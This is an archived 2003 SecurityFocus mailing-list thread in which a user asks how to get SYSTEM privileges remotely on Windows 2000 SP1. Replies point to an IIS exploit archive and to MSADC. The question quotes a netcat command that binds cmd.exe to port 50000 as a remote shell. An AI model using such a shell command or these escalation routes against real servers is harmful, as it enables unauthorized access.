Re: remote privilege escalation
From: Dave Aitel (dave@immunitysec.com)
Date: 01/09/03
- Previous message: Robert G. Ferrell: "Re: MS Terminal Services open to the world"
- In reply to: Javier Liendo: "Re: remote privilege escalation"
- Next in thread: noconflic: "Re: remote privilege escalation"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 8 Jan 2003 22:09:58 -0500 From: Dave Aitel <dave@immunitysec.com> To: javier@liendo.net
Also fun is using MSADC, since its enabled by default for localhost...
-dave
On Wed, 8 Jan 2003 15:11:16 -0800 (PST)
Javier Liendo <javier@liendo.net> wrote:
> hello
>
> have you tried
>
> http://www.digitaloffense.net/archives/iissystem/
>
> regards
>
> javir
>
> --- Jeremy Bartels <Jeremy.Bartels@allsecure-it.com>
> wrote:
> > Hi All,
> >
> > Can someone please tell me how I go about escalating
> > my privileges to SYSTEM
> > remotely on a windows 2000 Server SP1 'out of the
> > box' installation.
> >
> > I can do it when I am sitting in front of the PC
> > with ERunAs2X.exe
> > if I try to use ErunAs2X remotely with: ERunAs2X.exe
> > "nc.exe -l -p
> > 50000 -d -e cmd.exe"
> > I get the error:
> >
> > The application failed to initialize properly
> > (0xc0000142). Click on OK to
> > terminate the application.
> >
> > the title bar of the windows says: cmd.exe -
> > Application error
> >
> > does anyone have any ideas?
> >
> > Cheers
> >
> > Jeremy
> >
> >
> >
> >
> ---------------------------------------------------------------------
> -------
> > This list is provided by the SecurityFocus Security
> > Intelligence Alert (SIA)
> > Service. For more information on SecurityFocus' SIA
> > service which
> > automatically alerts you to the latest security
> > vulnerabilities please see:
> > https://alerts.securityfocus.com/
> >
>
>
> ---------------------------------------------------------------------
> ------- This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA) Service. For more information on
> SecurityFocus' SIA service which automatically alerts you to the
> latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Next message: Alfred Huger: "Subject: Re: AW: MS Terminal Services open to the world Thread"
- Previous message: Robert G. Ferrell: "Re: MS Terminal Services open to the world"
- In reply to: Javier Liendo: "Re: remote privilege escalation"
- Next in thread: noconflic: "Re: remote privilege escalation"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
